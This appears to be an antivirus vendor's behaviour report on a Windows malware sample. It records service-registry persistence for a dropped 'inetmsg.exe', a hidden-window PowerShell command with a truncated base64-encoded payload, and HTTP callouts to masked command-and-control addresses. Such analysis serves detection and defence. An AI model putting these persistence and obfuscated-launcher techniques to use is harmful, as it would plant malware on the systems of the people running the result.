Technical Information
To ensure autorun and distribution
Creates the following services
- [<HKLM>\System\CurrentControlSet\Services\inetmsg] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\inetmsg] 'ImagePath' = '"%WINDIR%\SysWOW64\inetmsg.exe"'
Malicious functions
Executes the following (exploit)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -en JABBAHoAeQB0AGoAaAB6AGcAYQB1AG0AaQBnAD0AJwBOAHYAeABkAHgAZwBjAGMAYgBuAGcAJwA7ACQATgBuAHkAagB0AGgAYwByAHoAagBvAHkAdgAgAD0AIAAnADkAMwA3ACcAOwAkAEkAaQBxAHMAZgBwAHMAbQA9ACcAUgBvAGcAeAB...
Modifies file system
Creates the following files
- %HOMEPATH%\937.exe
Moves the following files
- from %HOMEPATH%\937.exe to %WINDIR%\syswow64\inetmsg.exe
Network activity
TCP
HTTP GET requests
- http://ah#.#rbdev.com/wp-admin/qp0/
HTTP POST requests
- http://68.##4.229.171/qX9k4uNlSxr7c
UDP
- DNS ASK ah#.#rbdev.com
Miscellaneous
Creates and executes the following
- '%HOMEPATH%\937.exe'
- '%WINDIR%\syswow64\inetmsg.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -en JABBAHoAeQB0AGoAaAB6AGcAYQB1AG0AaQBnAD0AJwBOAHYAeABkAHgAZwBjAGMAYgBuAGcAJwA7ACQATgBuAHkAagB0AGgAYwByAHoAagBvAHkAdgAgAD0AIAAnADkAMwA3ACcAOwAkAEkAaQBxAHMAZgBwAHMAbQA9ACcAUgBvAGcAeAB...' (with hidden window)
